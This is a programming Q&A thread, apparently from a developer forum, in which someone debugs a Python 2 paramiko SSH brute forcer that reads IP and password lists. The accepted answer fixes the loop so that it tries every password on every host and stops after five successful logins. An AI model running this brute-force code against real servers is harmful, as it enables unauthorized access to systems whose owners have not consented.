# While loop using text file, only uses last line - Python 2.x

Tags: python, loops, ssh, while-loop, paramiko

I've been coding a small SSH brute forcer, to understand the paramiko module. However while going through the text file to see each password it is only testing out the last password in the text file. Am I using the correct loop? How would I use the for loop in this situation then?

```
import paramiko

UserName = 'msfadmin'
pass_file = 'pass.txt'
ip_file = 'ip.txt'
port = 22
Found = 0

pwd = open(pass_file, "r")
ips = open(ip_file, "r")

    def attempt():
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        for line in ips.readlines():
            ip = line.strip()
        for line2 in pwd.readlines():
            Passwords = line2.strip()

        while Found != 5:
            global UserName
            global port
            try:
                ssh.connect(ip, port, username=UserName, password=Passwords)
            except paramiko.AuthenticationException:
                print '[-] %s:%s fail!' % (UserName, Passwords)
            else:
                print '[!] %s:%s is CORRECT!' % (UserName, Passwords)
```

Comment: Updated my original post

Answer (score 1, accepted):

```
for line in ips.readlines():
    ip = line.strip()
for line2 in pwd.readlines():
    Passwords = line2.strip()
```

You are getting each and every line and replace the previous value in `ip` and `passwords` with the currently read value. Instead, if the number of ips and passwords are relatively smaller, you can do

```
count = 0
for ip in ips:
    for pwd in open(pass_file, "r"):
        try:
            ssh.connect(ip, port, username=UserName, password=pwd)
        except paramiko.AuthenticationException:
            print '[-] %s:%s fail!' % (UserName, pwd)
        else:
            print '[!] %s:%s is CORRECT for IP %s!' % (UserName, pwd, ip)
            count += 1
            if count == 5:
                return
```

Answer (score 0):

Your two for loops simply iterate through each object and update the `ip` and `Password` variables each time, so that when they have finished the variables refer to the last values from the loop.

However it's not at all clear what you are trying to do with those variables, so I can't tell you how to fix it. Did you want to run the rest of the script once for each iteration? Or did you want to create a list of all the elements, then iterate through that?

Comment: Sorry if I am not being clear enough, I am simply trying to go through every line of pass.txt and attempt to logon to the SSH server using the IP(s) in ip.txt The reason I am using the loop is I want it to try to connect until found is equal to 5, meaning it has successfully logged onto 5 servers and the loop will stop once found is equal to 5.